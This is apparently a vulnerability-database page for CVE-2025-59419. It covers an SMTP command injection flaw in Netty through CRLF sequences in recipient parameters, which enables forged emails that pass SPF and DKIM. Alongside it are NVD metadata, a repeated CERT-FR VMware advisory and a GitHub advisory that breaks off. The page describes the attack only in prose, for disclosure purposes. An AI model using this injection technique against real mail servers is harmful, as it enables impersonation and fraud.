cvelistv5 - cve-2025-59419

CVE-2025-59419 (GCVE-0-2025-59419)

Vulnerability from cvelistv5 – Published: 2025-10-15 15:42 – Updated: 2025-10-17 19:44

Summary

Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server's trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.

Severity ?

5.5 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

CWE

CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/netty/netty/security/advisorie…	x_refsource_CONFIRM
	https://github.com/netty/netty/commit/1782e8c2060…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	netty	netty	Affected: < 4.2.7.Final Affected: >= 4.2.0.Alpha1, < 4.1.128.Final

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-59419",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-15T17:21:01.815752Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-15T17:21:14.724Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-10-17T19:44:00.417Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419"
          }
        ],
        "title": "CVE Program Container",
        "x_generator": {
          "engine": "ADPogram 0.0.1"
        }
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "netty",
          "vendor": "netty",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.2.7.Final"
            },
            {
              "status": "affected",
              "version": "\u003e= 4.2.0.Alpha1, \u003c 4.1.128.Final"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server\u0027s trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-93",
              "description": "CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-15T15:42:30.922Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86"
        },
        {
          "name": "https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120"
        }
      ],
      "source": {
        "advisory": "GHSA-jq43-27x9-3v86",
        "discovery": "UNKNOWN"
      },
      "title": "Netty netty-codec-smtp SMTP Command Injection Vulnerability Allowing Email Forgery"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-59419",
    "datePublished": "2025-10-15T15:42:30.922Z",
    "dateReserved": "2025-09-15T19:13:16.904Z",
    "dateUpdated": "2025-10-17T19:44:00.417Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-59419\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-15T16:15:35.290\",\"lastModified\":\"2025-10-17T20:15:40.663\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\\\\r) and Line Feed (\\\\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server\u0027s trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-93\"}]}],\"references\":[{\"url\":\"https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419\"}], \"x_generator\": {\"engine\": \"ADPogram 0.0.1\"}, \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2025-10-17T19:44:00.417Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-59419\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-15T17:21:01.815752Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-15T17:21:07.093Z\"}}], \"cna\": {\"title\": \"Netty netty-codec-smtp SMTP Command Injection Vulnerability Allowing Email Forgery\", \"source\": {\"advisory\": \"GHSA-jq43-27x9-3v86\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"netty\", \"product\": \"netty\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.2.7.Final\"}, {\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.1.128.Final\"}]}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86\", \"name\": \"https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120\", \"name\": \"https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\\\\r) and Line Feed (\\\\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server\u0027s trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-93\", \"description\": \"CWE-93: Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-15T15:42:30.922Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-59419\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-17T19:44:00.417Z\", \"dateReserved\": \"2025-09-15T19:13:16.904Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-15T15:42:30.922Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2025-59419

Vulnerability from fkie_nvd - Published: 2025-10-15 16:15 - Updated: 2025-10-17 20:15

Severity ?

5.5 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120
	security-advisories@github.com	https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86
	af854a3a-2127-422b-91ae-364da2661108	https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server\u0027s trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist."
    }
  ],
  "id": "CVE-2025-59419",
  "lastModified": "2025-10-17T20:15:40.663",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.5,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-15T16:15:35.290",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-93"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

CERTFR-2025-AVI-1024

Vulnerability from certfr_avis - Published: 2025-11-19 - Updated: 2025-11-19

De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
VMware	Tanzu Greenplum	Tanzu Greenplum versions antérieures à 6.31.1
VMware	Tanzu Gemfire	Tanzu Gemfire versions antérieures à 10.1.5
VMware	Tanzu Greenplum	Tanzu Greenplum versions antérieures à 7.6.1

References

Title

Publication Time

Tags

Bulletin de sécurité VMware 36459	2025-11-18	vendor-advisory
Bulletin de sécurité VMware 36460	2025-11-18	vendor-advisory
Bulletin de sécurité VMware 36461	2025-11-18	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Tanzu Greenplum versions ant\u00e9rieures \u00e0 6.31.1",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Gemfire versions ant\u00e9rieures \u00e0 10.1.5",
      "product": {
        "name": "Tanzu Gemfire",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum versions ant\u00e9rieures \u00e0 7.6.1",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2022-27781",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-27781"
    },
    {
      "name": "CVE-2021-22901",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-22901"
    },
    {
      "name": "CVE-2024-6232",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
    },
    {
      "name": "CVE-2024-9287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
    },
    {
      "name": "CVE-2022-32207",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
    },
    {
      "name": "CVE-2025-5115",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-5115"
    },
    {
      "name": "CVE-2025-58057",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
    },
    {
      "name": "CVE-2024-4030",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-4030"
    },
    {
      "name": "CVE-2022-22576",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-22576"
    },
    {
      "name": "CVE-2022-32221",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-32221"
    },
    {
      "name": "CVE-2024-7592",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
    },
    {
      "name": "CVE-2024-2398",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
    },
    {
      "name": "CVE-2023-27533",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-27533"
    },
    {
      "name": "CVE-2025-58056",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
    },
    {
      "name": "CVE-2025-22871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
    },
    {
      "name": "CVE-2025-41254",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-41254"
    },
    {
      "name": "CVE-2024-4032",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
    },
    {
      "name": "CVE-2025-59419",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59419"
    },
    {
      "name": "CVE-2024-8088",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
    }
  ],
  "initial_release_date": "2025-11-19T00:00:00",
  "last_revision_date": "2025-11-19T00:00:00",
  "links": [],
  "reference": "CERTFR-2025-AVI-1024",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-11-19T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
  "vendor_advisories": [
    {
      "published_at": "2025-11-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 36459",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36459"
    },
    {
      "published_at": "2025-11-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 36460",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36460"
    },
    {
      "published_at": "2025-11-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 36461",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36461"
    }
  ]
}

CERTFR-2025-AVI-1024

Vulnerability from certfr_avis - Published: 2025-11-19 - Updated: 2025-11-19

De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

Vendor	Product	Description
VMware	Tanzu Greenplum	Tanzu Greenplum versions antérieures à 6.31.1
VMware	Tanzu Gemfire	Tanzu Gemfire versions antérieures à 10.1.5
VMware	Tanzu Greenplum	Tanzu Greenplum versions antérieures à 7.6.1

References

Title

Publication Time

Tags

Bulletin de sécurité VMware 36459	2025-11-18	vendor-advisory
Bulletin de sécurité VMware 36460	2025-11-18	vendor-advisory
Bulletin de sécurité VMware 36461	2025-11-18	vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Tanzu Greenplum versions ant\u00e9rieures \u00e0 6.31.1",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Gemfire versions ant\u00e9rieures \u00e0 10.1.5",
      "product": {
        "name": "Tanzu Gemfire",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    },
    {
      "description": "Tanzu Greenplum versions ant\u00e9rieures \u00e0 7.6.1",
      "product": {
        "name": "Tanzu Greenplum",
        "vendor": {
          "name": "VMware",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2022-27781",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-27781"
    },
    {
      "name": "CVE-2021-22901",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-22901"
    },
    {
      "name": "CVE-2024-6232",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
    },
    {
      "name": "CVE-2024-9287",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
    },
    {
      "name": "CVE-2022-32207",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-32207"
    },
    {
      "name": "CVE-2025-5115",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-5115"
    },
    {
      "name": "CVE-2025-58057",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
    },
    {
      "name": "CVE-2024-4030",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-4030"
    },
    {
      "name": "CVE-2022-22576",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-22576"
    },
    {
      "name": "CVE-2022-32221",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-32221"
    },
    {
      "name": "CVE-2024-7592",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
    },
    {
      "name": "CVE-2024-2398",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
    },
    {
      "name": "CVE-2023-27533",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-27533"
    },
    {
      "name": "CVE-2025-58056",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-58056"
    },
    {
      "name": "CVE-2025-22871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
    },
    {
      "name": "CVE-2025-41254",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-41254"
    },
    {
      "name": "CVE-2024-4032",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
    },
    {
      "name": "CVE-2025-59419",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-59419"
    },
    {
      "name": "CVE-2024-8088",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-8088"
    }
  ],
  "initial_release_date": "2025-11-19T00:00:00",
  "last_revision_date": "2025-11-19T00:00:00",
  "links": [],
  "reference": "CERTFR-2025-AVI-1024",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-11-19T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
  "vendor_advisories": [
    {
      "published_at": "2025-11-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 36459",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36459"
    },
    {
      "published_at": "2025-11-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 36460",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36460"
    },
    {
      "published_at": "2025-11-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 36461",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36461"
    }
  ]
}

GHSA-JQ43-27X9-3V86

Vulnerability from github – Published: 2025-10-15 17:12 – Updated: 2025-10-17 21:32

Summary

Netty has SMTP Command Injection Vulnerability that Allows Email Forgery

Details

Summary

